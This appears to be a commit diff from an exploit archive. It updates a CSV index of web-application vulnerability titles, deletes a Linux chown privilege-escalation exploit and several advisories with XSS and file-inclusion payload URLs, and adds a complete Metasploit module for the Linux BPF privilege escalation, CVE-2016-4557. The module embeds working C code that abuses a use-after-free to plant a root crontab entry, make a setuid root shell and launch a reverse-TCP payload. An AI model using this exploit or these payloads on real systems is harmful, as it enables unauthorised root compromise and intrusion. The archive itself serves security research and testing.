16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0
16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0
@ -28192,7 +28189,7 @@ id,file,description,date,author,platform,type,port
26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - popup.php Cross-Site Scripting",2005-11-21,[GB],php,webapps,0
26541,platforms/php/webapps/26541.txt,"SimplePoll - results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0
26543,platforms/php/webapps/26543.txt,"APBoard - thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0
26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - files.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0
26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0
26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0
26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - profile.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0
26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - mail.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0
@ -28570,7 +28567,7 @@ id,file,description,date,author,platform,type,port
26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0
26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
26988,platforms/php/webapps/26988.txt,"Dream4 Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
26990,platforms/php/webapps/26990.txt,"MyBB 1.0 - Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0
26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0
@ -29475,8 +29472,7 @@ id,file,description,date,author,platform,type,port
28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - calendar.php Remote File Inclusion",2006-07-13,Solpot,php,webapps,0
28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,php,webapps,0
28217,platforms/php/webapps/28217.txt,"Forum 5 - pm.php Local File Inclusion",2006-07-13,rgod,php,webapps,0
28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 - showtopic Module toid Parameter Cross-Site Scripting",2006-07-13,"Evampire chiristof",php,webapps,0
28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 - showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0
28219,platforms/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0
28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0
28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0
28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0
@ -31395,10 +31391,10 @@ id,file,description,date,author,platform,type,port
31101,platforms/php/webapps/31101.txt,"HispaH YouTube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0
31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - operator/article/article_search_results.asp txtSearch Parameter Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0
31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - operator/article/article_attachment.asp Attach_Id Parameter Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps,0
31107,platforms/php/webapps/31107.txt,"Portail Web PHP 2.5.1 - config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31108,platforms/php/webapps/31108.txt,"Portail Web PHP 2.5.1 - menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31109,platforms/php/webapps/31109.txt,"Portail Web PHP 2.5.1 - modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31110,platforms/php/webapps/31110.txt,"Portail Web PHP 2.5.1 - system/login.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31107,platforms/php/webapps/31107.txt,"Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31108,platforms/php/webapps/31108.txt,"Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31109,platforms/php/webapps/31109.txt,"Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31110,platforms/php/webapps/31110.txt,"Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusion",2008-02-05,Psiczn,php,webapps,0
31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0
31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Parameter Cross-Site Scripting",2008-02-06,SkyOut,php,webapps,0
@ -31435,7 +31431,6 @@ id,file,description,date,author,platform,type,port
31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0
40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
@ -31544,11 +31539,9 @@ id,file,description,date,author,platform,type,port
31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps,0
31303,platforms/php/webapps/31303.txt,"Joomla! / Mambo Component 'com_inter' - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0
31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0
31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 - 'main.php' Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0
31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure",2008-02-28,"Richard Brain",cgi,webapps,0
31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'Username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0
31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Parameter Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0
31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0
31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0
31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0
31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0
@ -32811,7 +32804,7 @@ id,file,description,date,author,platform,type,port
33441,platforms/php/webapps/33441.txt,"Joomla! Component Joomulus 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0
33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0
33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion",2009-12-28,Securitylab.ir,php,webapps,0
33444,platforms/php/webapps/33444.txt,"DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion",2009-12-28,Securitylab.ir,php,webapps,0
33445,platforms/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0
@ -36810,3 +36803,4 @@ id,file,description,date,author,platform,type,port
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0

Can't render this file because it is too large.

76
platforms/linux/local/40726.c
View file

@ -1,76 +0,0 @@
/*
* $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_chown.c - sys_chown missing DAC controls on Linux
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in Linux kernel 2.x may allow local users to
* modify the group ID of files, such as NFS exported files in kernel
* 2.4 (CAN-2004-0497).
*
* "Basically, you can change the group of a file you don't own, but not
* of an SGID executable." -- Solar Designer (0dd)
*
* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian
* 3.0, probably others) the shadow group has read access to it.
* 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
int main(int argc, char **argv)
{
char cmd[256];
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
exit(1);
}
/* ninpou: sys_chown no jutsu! */
if (chown(argv[1], -1, getgid()) < 0) {
switch(errno) {
case EPERM:
fprintf(stderr, "Error: Not vulnerable!\n");
break;
default:
perror("Error");
}
exit(1);
}
fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");
/* print some output */
sprintf(cmd, "/bin/ls -l %s", argv[1]);
system(cmd);
exit(0);
}

501
platforms/linux/local/40759.rb Executable file
View file

@ -0,0 +1,501 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => 'Linux BPF Local Privilege Escalation',
'Description' => %q{
Linux kernel >=4.4 with CONFIG_BPF_SYSCALL and kernel.unprivileged_bpf_disabled
sysctl is not set to 1, BPF can be abused to priv escalate.
Ubuntu 16.04 has all of these conditions met.
},
'License' => MSF_LICENSE,
'Author' =>
[
'jannh@google.com', # discovery
'h00die <mike@shorebreaksecurity.com>' # metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'CVE', '2016-4557' ],
[ 'EDB', '39772' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=808' ],
[ 'URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7' ]
],
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultOptions' =>
{
'payload' => 'linux/x64/mettle/reverse_tcp',
'PrependFork' => true,
'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through
},
'DefaultTarget' => 1,
'DisclosureDate' => 'May 04 2016',
'Privileged' => true
}
))
register_options([
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ])
], self.class)
end
def check
def check_config_bpf_syscall?()
output = cmd_exec('grep CONFIG_BPF_SYSCALL /boot/config-`uname -r`')
if output == 'CONFIG_BPF_SYSCALL=y'
vprint_good('CONFIG_BPF_SYSCALL is set to yes')
return true
else
print_error('CONFIG_BPF_SYSCALL is NOT set to yes')
return false
end
end
def check_kernel_disabled?()
output = cmd_exec('sysctl kernel.unprivileged_bpf_disabled')
if output != 'kernel.unprivileged_bpf_disabled = 1'
vprint_good('kernel.unprivileged_bpf_disabled is NOT set to 1')
return true
else
print_error('kernel.unprivileged_bpf_disabled is set to 1')
return false
end
end
def check_fuse?()
lib = cmd_exec('dpkg --get-selections | grep ^fuse')
if lib.include?('install')
vprint_good('fuse is installed')
return true
else
print_error('fuse is not installed. Exploitation will fail.')
return false
end
end
def mount_point_exists?()
if directory?('/tmp/fuse_mount')
print_error('/tmp/fuse_mount should be unmounted and deleted. Exploitation will fail.')
return false
else
vprint_good('/tmp/fuse_mount doesn\'t exist')
return true
end
end
if check_config_bpf_syscall?() && check_kernel_disabled?() && check_fuse?() && mount_point_exists?()
CheckCode::Appears
else
CheckCode::Safe
end
end
def exploit
def upload_and_compile(filename, file_path, file_content, compile=nil)
rm_f "#{file_path}"
if not compile.nil?
rm_f "#{file_path}.c"
vprint_status("Writing #{filename} to #{file_path}.c")
write_file("#{file_path}.c", file_content)
register_file_for_cleanup("#{file_path}.c")
output = cmd_exec(compile)
if output != ''
print_error(output)
fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
end
else
vprint_status("Writing #{filename} to #{file_path}")
write_file(file_path, file_content)
end
cmd_exec("chmod +x #{file_path}");
register_file_for_cleanup(file_path)
end
doubleput = %q{
#define _GNU_SOURCE
#include <stdbool.h>
#include <errno.h>
#include <err.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/bpf.h>
#include <linux/kcmp.h>
#ifndef __NR_bpf
# if defined(__i386__)
# define __NR_bpf 357
# elif defined(__x86_64__)
# define __NR_bpf 321
# elif defined(__aarch64__)
# define __NR_bpf 280
# else
# error
# endif
#endif
int uaf_fd;
int task_b(void *p) {
/* step 2: start writev with slow IOV, raising the refcount to 2 */
char *cwd = get_current_dir_name();
char data[2048];
sprintf(data, "* * * * * root /bin/chown root:root '%s'/suidhelper; /bin/chmod 06755 '%s'/suidhelper\n#", cwd, cwd);
struct iovec iov = { .iov_base = data, .iov_len = strlen(data) };
if (system("fusermount -u /home/user/ebpf_mapfd_doubleput/fuse_mount 2>/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mount"))
errx(1, "system() failed");
int fuse_fd = open("fuse_mount/hello", O_RDWR);
if (fuse_fd == -1)
err(1, "unable to open FUSE fd");
if (write(fuse_fd, &iov, sizeof(iov)) != sizeof(iov))
errx(1, "unable to write to FUSE fd");
struct iovec *iov_ = mmap(NULL, sizeof(iov), PROT_READ, MAP_SHARED, fuse_fd, 0);
if (iov_ == MAP_FAILED)
err(1, "unable to mmap FUSE fd");
fputs("starting writev\n", stderr);
ssize_t writev_res = writev(uaf_fd, iov_, 1);
/* ... and starting inside the previous line, also step 6: continue writev with slow IOV */
if (writev_res == -1)
err(1, "writev failed");
if (writev_res != strlen(data))
errx(1, "writev returned %d", (int)writev_res);
fputs("writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.\n", stderr);
while (1) sleep(1); /* whatever, just don't crash */
}
void make_setuid(void) {
/* step 1: open writable UAF fd */
uaf_fd = open("/dev/null", O_WRONLY|O_CLOEXEC);
if (uaf_fd == -1)
err(1, "unable to open UAF fd");
/* refcount is now 1 */
char child_stack[20000];
int child = clone(task_b, child_stack + sizeof(child_stack), CLONE_FILES | SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
sleep(3);
/* refcount is now 2 */
/* step 2+3: use BPF to remove two references */
for (int i=0; i<2; i++) {
struct bpf_insn insns[2] = {
{
.code = BPF_LD | BPF_IMM | BPF_DW,
.src_reg = BPF_PSEUDO_MAP_FD,
.imm = uaf_fd
},
{
}
};
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = 2,
.insns = (__aligned_u64) insns,
.license = (__aligned_u64)""
};
if (syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) != -1)
errx(1, "expected BPF_PROG_LOAD to fail, but it didn't");
if (errno != EINVAL)
err(1, "expected BPF_PROG_LOAD to fail with -EINVAL, got different error");
}
/* refcount is now 0, the file is freed soon-ish */
/* step 5: open a bunch of readonly file descriptors to the target file until we hit the same pointer */
int status;
int hostnamefds[1000];
int used_fds = 0;
bool up = true;
while (1) {
if (waitpid(child, &status, WNOHANG) == child)
errx(1, "child quit before we got a good file*");
if (up) {
hostnamefds[used_fds] = open("/etc/crontab", O_RDONLY);
if (hostnamefds[used_fds] == -1)
err(1, "open target file");
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, hostnamefds[used_fds]) == 0) break;
used_fds++;
if (used_fds == 1000) up = false;
} else {
close(hostnamefds[--used_fds]);
if (used_fds == 0) up = true;
}
}
fputs("woohoo, got pointer reuse\n", stderr);
while (1) sleep(1); /* whatever, just don't crash */
}
int main(void) {
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0)
make_setuid();
struct stat helperstat;
while (1) {
if (stat("suidhelper", &helperstat))
err(1, "stat suidhelper");
if (helperstat.st_mode & S_ISUID)
break;
sleep(1);
}
fputs("suid file detected, launching rootshell...\n", stderr);
execl("./suidhelper", "suidhelper", NULL);
err(1, "execl suidhelper");
}
}
suid_helper = %q{
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>
int main(void) {
if (setuid(0) || setgid(0))
err(1, "setuid/setgid");
fputs("we have root privs now...\n", stderr);
execl("/bin/bash", "bash", NULL);
err(1, "execl");
}
}
hello = %q{
/*
FUSE: Filesystem in Userspace
Copyright (C) 2001-2007 Miklos Szeredi <miklos@szeredi.hu>
heavily modified by Jann Horn <jannh@google.com>
This program can be distributed under the terms of the GNU GPL.
See the file COPYING.
gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello
*/
#define FUSE_USE_VERSION 26
#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/uio.h>
static const char *hello_path = "/hello";
static char data_state[sizeof(struct iovec)];
static int hello_getattr(const char *path, struct stat *stbuf)
{
int res = 0;
memset(stbuf, 0, sizeof(struct stat));
if (strcmp(path, "/") == 0) {
stbuf->st_mode = S_IFDIR | 0755;
stbuf->st_nlink = 2;
} else if (strcmp(path, hello_path) == 0) {
stbuf->st_mode = S_IFREG | 0666;
stbuf->st_nlink = 1;
stbuf->st_size = sizeof(data_state);
stbuf->st_blocks = 0;
} else
res = -ENOENT;
return res;
}
static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, hello_path + 1, NULL, 0);
return 0;
}
static int hello_open(const char *path, struct fuse_file_info *fi) {
return 0;
}
static int hello_read(const char *path, char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {
sleep(10);
size_t len = sizeof(data_state);
if (offset < len) {
if (offset + size > len)
size = len - offset;
memcpy(buf, data_state + offset, size);
} else
size = 0;
return size;
}
static int hello_write(const char *path, const char *buf, size_t size, off_t offset, struct fuse_file_info *fi) {
if (offset != 0)
errx(1, "got write with nonzero offset");
if (size != sizeof(data_state))
errx(1, "got write with size %d", (int)size);
memcpy(data_state + offset, buf, size);
return size;
}
static struct fuse_operations hello_oper = {
.getattr = hello_getattr,
.readdir = hello_readdir,
.open = hello_open,
.read = hello_read,
.write = hello_write,
};
int main(int argc, char *argv[]) {
return fuse_main(argc, argv, &hello_oper, NULL);
}
}
hello_filename = 'hello'
hello_path = "#{datastore['WritableDir']}/#{hello_filename}"
doubleput_file = "#{datastore['WritableDir']}/doubleput"
suidhelper_filename = 'suidhelper'
suidhelper_path = "#{datastore['WritableDir']}/#{suidhelper_filename}"
payload_filename = rand_text_alpha(8)
payload_path = "#{datastore['WritableDir']}/#{payload_filename}"
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
def has_prereqs?()
def check_libfuse_dev?()
lib = cmd_exec('dpkg --get-selections | grep libfuse-dev')
if lib.include?('install')
vprint_good('libfuse-dev is installed')
return true
else
print_error('libfuse-dev is not installed. Compiling will fail.')
return false
end
end
def check_gcc?()
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
return true
else
print_error('gcc is not installed. Compiling will fail.')
return false
end
end
def check_pkgconfig?()
lib = cmd_exec('dpkg --get-selections | grep ^pkg-config')
if lib.include?('install')
vprint_good('pkg-config is installed')
return true
else
print_error('pkg-config is not installed. Exploitation will fail.')
return false
end
end
return check_libfuse_dev?() && check_gcc?() && check_pkgconfig?()
end
compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if compile == false
# doubleput file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'doubleput')
fd = ::File.open( path, "rb")
doubleput = fd.read(fd.stat.size)
fd.close
# hello file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'hello')
fd = ::File.open( path, "rb")
hello = fd.read(fd.stat.size)
fd.close
# suidhelper file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4557', 'suidhelper')
fd = ::File.open( path, "rb")
suid_helper = fd.read(fd.stat.size)
fd.close
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = 'AyDJSaMM'
payload_path = '/tmp/AyDJSaMM'
end
# make our substitutions so things are dynamic
suid_helper.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/,
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
doubleput.gsub!(/execl\(".\/suidhelper", "suidhelper", NULL\);/,
'exit(0);')
print_status('Writing files to target')
cmd_exec("cd #{datastore['WritableDir']}")
upload_and_compile('hello', hello_path, hello, compile ? "gcc -o #{hello_filename} #{hello_filename}.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`" : nil)
upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil)
upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil)
upload_and_compile('payload', payload_path, generate_payload_exe)
print_status('Starting execution of priv esc. This may take about 120 seconds')
cmd_exec(doubleput_file)
sec_waited = 0
until sec_waited > datastore['MAXWAIT'] do
Rex.sleep(1)
# check file permissions
if cmd_exec("ls -lah #{suidhelper_path}").include?('-rwsr-sr-x 1 root root')
print_good('got root, starting payload')
print_error('This exploit may require process killing of \'hello\', and \'doubleput\' on the target')
print_error('This exploit may require manual umounting of /tmp/fuse_mount via \'fusermount -z -u /tmp/fuse_mount\' on the target')
print_error('This exploit may require manual deletion of /tmp/fuse_mount via \'rm -rf /tmp/fuse_mount\' on the target')
cmd_exec("#{suidhelper_path}")
return
end
sec_waited +=1
end
end
def on_new_session(session)
# if we don't /bin/bash here, our payload times out
# [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:37022) at 2016-09-27 14:15:04 -0400
# [*] 192.168.199.130 - Meterpreter session 2 closed. Reason: Died
session.shell_command_token('/bin/bash')
super
end
end

0
platforms/osx/local/40669.txt → platforms/macos/local/40669.txt
View file

7
platforms/php/webapps/28218.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/18970/info
Koobi Pro prone to a cross-site scripting issue and an SQL-injection issue because the application fails to properly sanitize user-supplied input.
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
http://www.example.com/index.php?showtopic=[XSS]

9
platforms/php/webapps/31312.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28035/info
Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
This issue affects Barryvan Compo Manager 0.3; other versions may also be vulnerable.
http://www.example.com/main.php?pageURL=[Evil_Code]

9
platforms/php/webapps/31316.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28043/info
Centreon is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Centreon 1.4.2.2 and 1.4.2.3 are vulnerable; other versions may also be affected.
http://www.example.com//include/common/javascript/color_picker.php?&name=XSS&title=%3Cscript%3Ea=/Test%20XSS/;alert(a.source)%3C/script%3E

9
platforms/php/webapps/31336.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/28106/info
Podcast Generator is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Podcast Generator 0.96.2 is vulnerable; other versions may also be affected.
http://www.example.com/podcastgen-0.96.2/setup/set_permissions.php?scriptlang="><script>alert("XSS")</script

42
platforms/php/webapps/36137.txt
View file

@ -5,32 +5,32 @@ PunBB is prone to multiple cross-site scripting vulnerabilities because it fails
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
GET
